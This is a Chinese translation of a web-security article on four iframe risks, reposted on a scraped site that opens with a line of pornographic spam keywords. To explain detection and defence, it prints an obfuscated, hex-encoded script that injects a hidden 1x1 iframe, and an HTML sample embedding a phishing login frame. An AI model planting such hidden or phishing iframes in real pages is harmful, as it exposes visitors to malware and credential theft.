国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

每個(gè) Web 開(kāi)發(fā)人員都應(yīng)該知道的 4 個(gè) iframe 安全問(wèn)題

這篇具有很好參考價(jià)值的文章主要介紹了每個(gè) Web 開(kāi)發(fā)人員都應(yīng)該知道的 4 個(gè) iframe 安全問(wèn)題。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

  • 原文地址:4 Security Concerns with iframes Every Web Developer Should Know
  • 原文作者:Piumi Liyana Gunawardhana
  • 譯文出自:掘金翻譯計(jì)劃
  • 本文永久鏈接:github.com/xitu/gold-m…
  • 譯者:jaredliw
  • 校對(duì)者:Usualminds、KimYangOfCat

iframe 是 Web 開(kāi)發(fā)中最古老、最簡(jiǎn)單的內(nèi)容嵌入技術(shù)之一,時(shí)至今日仍被使用。然而,在實(shí)踐中使用 iframe 可能會(huì)帶來(lái)一些安全隱患,向攻擊者敞開(kāi)大門。


因此,在這篇文章中,我將討論使用 iframe 前需要注意的 4 個(gè)安全風(fēng)險(xiǎn)問(wèn)題。

1. iframe 注入

iframe 注入是一個(gè)非常常見(jiàn)的跨站腳本攻擊(XSS)。

iframe 使用多個(gè)標(biāo)簽在網(wǎng)頁(yè)上展示 HTML 文檔并將用戶重定向到其他的網(wǎng)站。此行為允許第三方將惡意的可執(zhí)行程序、病毒或蠕蟲(chóng)植入你的 web 程序中,并在用戶的設(shè)備上運(yùn)行。

我們可以通過(guò)掃描 Web 服務(wù)器發(fā)送的 HTML 來(lái)找出 iframe 的注入位置。你需要做的只是在你的瀏覽器中打開(kāi)一個(gè)頁(yè)面,然后啟用 view source 功能來(lái)查看 HTML。由于這些 iframe 通常指向原生 IP 地址,因此你應(yīng)該搜索 <iframe> 標(biāo)簽,而不是域名。

舉例來(lái)說(shuō),讓我們看看以下的代碼:

++++%23wp+/+GPL%0A%3CScript+Language%3D%27Javascript%27%3E%0A++++%3C%21–%0A++++document.write%28unescape%28%273c696672616d65207372633d27687474703a2f2f696e666
f736563696e737469747574652e636f6d2f272077696474683d273127206865696768743d273127207374
796c653d277669736962696c6974793a2068696464656e3b273e3c2f696672616d653e%27%29%29%3B%0A
++++//–%3E%0A++++%3C/Script%3E 

它看起來(lái)很正常,似乎是和這個(gè)站點(diǎn)相關(guān)的代碼。實(shí)際上,它就是問(wèn)題的根源。如果你用 JavaScript 函數(shù)對(duì)其進(jìn)行解碼,輸出結(jié)果會(huì)是這樣的:

#wp / GPL
<Script Language=’Javascript’> <!–
document.write(unescape(‘3c696672616d65207372633d27687474703a2f2f696e666f73656369
6e737469747574652e636f6d2f272077696474683d273127206865696768743d273127207374796c653d
277669736962696c6974793a2068696464656e3b273e3c2f696672616d653e’));
//–> </Script> 

同樣,這看起來(lái)也是合法的,因?yàn)楣粽呤褂昧?GPLwp 并將語(yǔ)言設(shè)為 JavaScript。這些數(shù)字和字母似乎是十六進(jìn)制的,所以接下來(lái)我們可以使用十六進(jìn)制解碼器來(lái)將其解碼,最終結(jié)果如下:

<iframe src='https://www.infosecinstitute.com/' width='1' height='1' style='visibility: hidden;'></iframe> 

因此,當(dāng)你在 HTML 中找到一個(gè) iframe,并發(fā)現(xiàn)它不是你放置的,你應(yīng)該盡快調(diào)查原因并從網(wǎng)站或數(shù)據(jù)庫(kù)中移除它。

2. 跨框架腳本攻擊

跨框架腳本攻擊(XFS)結(jié)合 iframe 和 JavaScript 惡意腳本,用于竊取用戶的資料。

XFS 攻擊者說(shuō)服用戶訪問(wèn)由他所控制的網(wǎng)頁(yè),并通過(guò) iframe 引用一個(gè)結(jié)合了惡意腳本的合法站點(diǎn)。當(dāng)用戶在向 iframe 中的合法網(wǎng)站輸入憑據(jù)時(shí),JavaScript 惡意腳本將記錄他們的輸入。


通過(guò)在 Web 服務(wù)器配置中設(shè)置 Content-Security-Policy: frame-ancestorsX-Frame-Options 能防止此攻擊。

3. 點(diǎn)擊劫持

點(diǎn)擊劫持攻擊能誘騙用戶點(diǎn)擊隱藏的網(wǎng)頁(yè)元素。由此一來(lái),用戶可能會(huì)因此在無(wú)意中下載惡意程序,瀏覽惡意網(wǎng)站,提供密碼或敏感信息、轉(zhuǎn)賬或進(jìn)行網(wǎng)絡(luò)購(gòu)物。

攻擊者通常會(huì)通過(guò) iframe 在網(wǎng)站上覆蓋一個(gè)不可見(jiàn)的 HTML 元素來(lái)執(zhí)行點(diǎn)擊劫持。

用戶以為他點(diǎn)擊了顯示的那個(gè)頁(yè)面,然而,他所點(diǎn)擊的是覆蓋在其之上的隱藏元素。

有兩種主要策略可以保護(hù)自己免受點(diǎn)擊劫持:

  • 客戶端中最流行的方法是 Frame Busting,但這并不是最好的解決方法,因?yàn)?iframe 只是被忽略了而已。
  • 服務(wù)端中的最好辦法是使用 X-Frame-Options。安全專家強(qiáng)烈地建議從服務(wù)端解決點(diǎn)擊劫持的問(wèn)題。

4. iframe 網(wǎng)絡(luò)釣魚(yú)

試考慮一個(gè)社交平臺(tái),它允許用戶和開(kāi)發(fā)人員使用 iframe 將第三方網(wǎng)頁(yè)合并到他們的粉絲頁(yè)面或其他的應(yīng)用程序中。

攻擊者經(jīng)常濫用這個(gè)功能來(lái)將 iframe 用于網(wǎng)絡(luò)釣魚(yú)攻擊。

在預(yù)設(shè)情況下,iframe 中的內(nèi)容能重定向頂級(jí)窗口。因此,攻擊者可能會(huì)利用跨站腳本(XSS)漏洞來(lái)將網(wǎng)絡(luò)釣魚(yú)的代碼當(dāng)作 iframe 植入到 Web 應(yīng)用程序中,引導(dǎo)用戶進(jìn)入釣魚(yú)網(wǎng)站。

作為示例,試思考以下代碼:

<html><head><title>Infosec Institute iFrame by Irfan</title></head><body><iframe src=”/user/piumi/” width=”1450″ height=”300″ frameborder=”0″></iframe><iframe src=”http://phishing.com/wp-login” width=”1450″ height=”250″ frameborder=”0″></iframe></body>
</html> 

上方的代碼中包含一個(gè) iframe 嵌入的網(wǎng)絡(luò)釣魚(yú)站點(diǎn)。用戶會(huì)被重定向到那里,如果用戶沒(méi)注意網(wǎng)址欄,攻擊者將能輕松地獲取用戶憑據(jù)。

iframe 網(wǎng)絡(luò)釣魚(yú)攻擊者不能偽造網(wǎng)址欄,但他們能觸發(fā)重定向,操縱用戶之后所接收的內(nèi)容。


這個(gè)問(wèn)題可以通過(guò)替換 sandbox 中的 allow-top-navigation 屬性值來(lái)避免。

最后的一些看法

iframe 能提高用戶的互動(dòng)性。但是,當(dāng)你使用 iframe 的時(shí)候,你處理的內(nèi)容是來(lái)自于你無(wú)法控制的第三方。因此,iframe 經(jīng)常會(huì)對(duì)你的應(yīng)用程序造成威脅。

然而,我們不能因?yàn)榘踩檻]就停止使用 iframe。我們需要意識(shí)到這些問(wèn)題并采取防范措施來(lái)保護(hù)我們的應(yīng)用程序。

我認(rèn)為這篇文章能幫你識(shí)別使用 iframe 的安全問(wèn)題。在下方評(píng)論區(qū)讓我知道你的看法。


謝謝您的閱讀!

如果發(fā)現(xiàn)譯文存在錯(cuò)誤或其他需要改進(jìn)的地方,歡迎到 掘金翻譯計(jì)劃 對(duì)譯文進(jìn)行修改并 PR,也可獲得相應(yīng)獎(jiǎng)勵(lì)積分。文章開(kāi)頭的 本文永久鏈接 即為本文在 GitHub 上的 MarkDown 鏈接。


掘金翻譯計(jì)劃 是一個(gè)翻譯優(yōu)質(zhì)互聯(lián)網(wǎng)技術(shù)文章的社區(qū),文章來(lái)源為 掘金 上的英文分享文章。內(nèi)容覆蓋 Android、iOS、前端、后端、區(qū)塊鏈、產(chǎn)品、設(shè)計(jì)、人工智能等領(lǐng)域,想要查看更多優(yōu)質(zhì)譯文請(qǐng)持續(xù)關(guān)注 掘金翻譯計(jì)劃、官方微博、知乎專欄。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-486832.html

到了這里,關(guān)于每個(gè) Web 開(kāi)發(fā)人員都應(yīng)該知道的 4 個(gè) iframe 安全問(wèn)題的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 每個(gè)程序員都應(yīng)該知道的8大算法

    在編程開(kāi)發(fā)中,算法是用于解決特定問(wèn)題或完成特定任務(wù)的一組指令或過(guò)程。算法可以用任何編程語(yǔ)言表示,可以像一系列基本操作一樣簡(jiǎn)單,也可以像涉及不同數(shù)據(jù)結(jié)構(gòu)和邏輯的多步驟過(guò)程一樣復(fù)雜。 算法的主要目標(biāo)是接收輸入、處理它并提供預(yù)期的輸出。算法可以根據(jù)時(shí)

    2023年04月11日
    瀏覽(91)
  • 每個(gè) AI/ML 工程師都應(yīng)該知道的 Gen AI 框架和工具!

    每個(gè) AI/ML 工程師都應(yīng)該知道的 Gen AI 框架和工具!

    在快速發(fā)展的技術(shù)領(lǐng)域,生成式人工智能是一股革命性的力量,它改變了開(kāi)發(fā)人員和AI/ML工程師處理復(fù)雜問(wèn)題和創(chuàng)新的方式。本文深入探討了生成式 AI 的世界,揭示了對(duì)每個(gè)開(kāi)發(fā)人員都至關(guān)重要的框架和工具。 LangChain?由?Harrison Chase?開(kāi)發(fā)并于 2022 年 10 月首次亮相,是一個(gè)開(kāi)

    2024年01月22日
    瀏覽(27)
  • 開(kāi)發(fā)人員應(yīng)該了解哪些 SQL 知識(shí)?

    SQL(結(jié)構(gòu)化查詢語(yǔ)言)是數(shù)據(jù)庫(kù)的通用語(yǔ)言,它無(wú)處不在、功能強(qiáng)大,并且對(duì)于開(kāi)發(fā)人員來(lái)說(shuō)理解非常重要。從這些技巧開(kāi)始。 作者:Charly Batista 本文和封面來(lái)源:https://www.infoworld.com/,愛(ài)可生開(kāi)源社區(qū)翻譯。 本文約 2700 字,預(yù)計(jì)閱讀需要 9 分鐘。 自 20 世紀(jì) 70 年代初發(fā)明

    2024年01月19日
    瀏覽(27)
  • Reflect API:每個(gè) JavaScript 開(kāi)發(fā)人員都需要的瑞士軍刀

    您是否曾經(jīng)希望擁有一個(gè)神奇的工具包, 可以讓您像超級(jí)英雄一樣控制 JavaScript 對(duì)象 ?向 Reflect API 打個(gè)招呼吧,它是 ES6 中引入的一個(gè)新的全局對(duì)象 ,它能夠處理簡(jiǎn)單的代碼操作。它是每個(gè)現(xiàn)代 JavaScript 開(kāi)發(fā)人員都需要的瑞士軍刀!?? 本文的目標(biāo)是幫助您更好地理解 Jav

    2024年02月05日
    瀏覽(16)
  • 重要!每個(gè)開(kāi)發(fā)者都應(yīng)該掌握的9個(gè)核心算法

    許多開(kāi)發(fā)者似乎都有一個(gè)很大的誤解,認(rèn)為算法在編程工作中沒(méi)什么用處,只是工作面試中的加分項(xiàng)。其實(shí)并不是這樣的,成為一名有秀的開(kāi)發(fā)者,極其重要的是具備算法思維能力。不僅能夠復(fù)制和修改標(biāo)準(zhǔn)算法,還能夠使用代碼運(yùn)用算法解決遇到的任何問(wèn)題。 這里介紹9種

    2024年02月11日
    瀏覽(21)
  • 建議收藏 - 必須知道的4個(gè)前端安全編碼規(guī)范,0基礎(chǔ)web前端開(kāi)發(fā)

    建議收藏 - 必須知道的4個(gè)前端安全編碼規(guī)范,0基礎(chǔ)web前端開(kāi)發(fā)

    2.構(gòu)造GET和POST請(qǐng)求 若某攻擊者想刪除某網(wǎng)站的一篇文章,首先獲得當(dāng)前文章的id,然后通過(guò)使用腳本 插入圖片 發(fā)送一個(gè) GET請(qǐng)求 ,或 構(gòu)造表單 , XMLHTTPRequest 發(fā)送 POST請(qǐng)求 以達(dá)到刪除該文章的目的 3.XSS釣魚(yú) 釣魚(yú) 這個(gè)詞一般認(rèn)識(shí)是起源于 社會(huì)工程學(xué) ,黑客使用這個(gè)這門學(xué)科

    2024年04月22日
    瀏覽(26)
  • 你知道機(jī)器人奇點(diǎn)嗎?機(jī)器人奇點(diǎn)問(wèn)題應(yīng)該如何解決?

    你知道機(jī)器人奇點(diǎn)嗎?機(jī)器人奇點(diǎn)問(wèn)題應(yīng)該如何解決?

    原創(chuàng)/文 BFT機(jī)器人 ? “機(jī)器人奇點(diǎn)”——一個(gè)讓機(jī)器人廠商和用戶聽(tīng)到都聞風(fēng)喪膽的詞,一旦碰上,輕則重新編程調(diào)試,重則要和你的機(jī)器人say goodbye了。 提及“奇點(diǎn)“二字,你可能會(huì)立刻聯(lián)想到黑洞。因?yàn)樵谖锢韺W(xué)、宇宙學(xué)中,“奇點(diǎn)”也被稱為時(shí)空奇點(diǎn)或引力奇點(diǎn),它是

    2024年02月13日
    瀏覽(15)
  • 15個(gè)對(duì)Web開(kāi)發(fā)人員有用工具網(wǎng)站

    15個(gè)對(duì)Web開(kāi)發(fā)人員有用工具網(wǎng)站

    1. 代碼轉(zhuǎn)圖片 網(wǎng)址:https://carbon.now.sh/ 使用 Carbon 創(chuàng)建和分享源代碼的精美圖像。它提供了多種代碼風(fēng)格和主題。 3.圖片圖庫(kù) 網(wǎng)址:https://unsplash.com/ 4. 智能 WebP、PNG 和 JPEG 圖片壓縮 網(wǎng)址:https://tinypng.com/ tinypng免費(fèi)使用,壓縮后的圖片清晰度高。 5. Codepen 網(wǎng)址:https://codepen

    2024年02月05日
    瀏覽(26)
  • 如何利用安全開(kāi)發(fā)框架和庫(kù),幫助開(kāi)發(fā)人員編寫(xiě)更安全的代碼?

    隨著互聯(lián)網(wǎng)的迅速發(fā)展以及數(shù)字化技術(shù)的普及,網(wǎng)絡(luò)攻擊日益頻繁且更具破壞性. 在軟件開(kāi)發(fā)過(guò)程中,為了確保軟件的安全性和可靠性,開(kāi)發(fā)者需要遵循一系列最佳實(shí)踐和安全標(biāo)準(zhǔn)來(lái)避免潛在的網(wǎng)絡(luò)風(fēng)險(xiǎn)和挑戰(zhàn). 其中一種有效的實(shí)現(xiàn)方法是采用**安全開(kāi)發(fā)生命周期 (SDL)** 和 **安全編

    2024年03月24日
    瀏覽(30)
  • 前端開(kāi)發(fā)人員:新時(shí)代的安全冠軍

    前端開(kāi)發(fā)人員:新時(shí)代的安全冠軍

    ?Web 開(kāi)發(fā)自誕生以來(lái)已經(jīng)發(fā)生了巨大的變化。然而,一個(gè)普遍的問(wèn)題仍然存在:前端開(kāi)發(fā)人員仍然需要依賴后端開(kāi)發(fā)人員來(lái)使用 API、編寫(xiě)后端代碼或解決安全問(wèn)題。 這種依賴在前端和后端團(tuán)隊(duì)之間造成了分歧,阻礙了開(kāi)發(fā)過(guò)程及其速度,并可能為安全漏洞打開(kāi)大門。 現(xiàn)代前

    2024年02月11日
    瀏覽(23)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包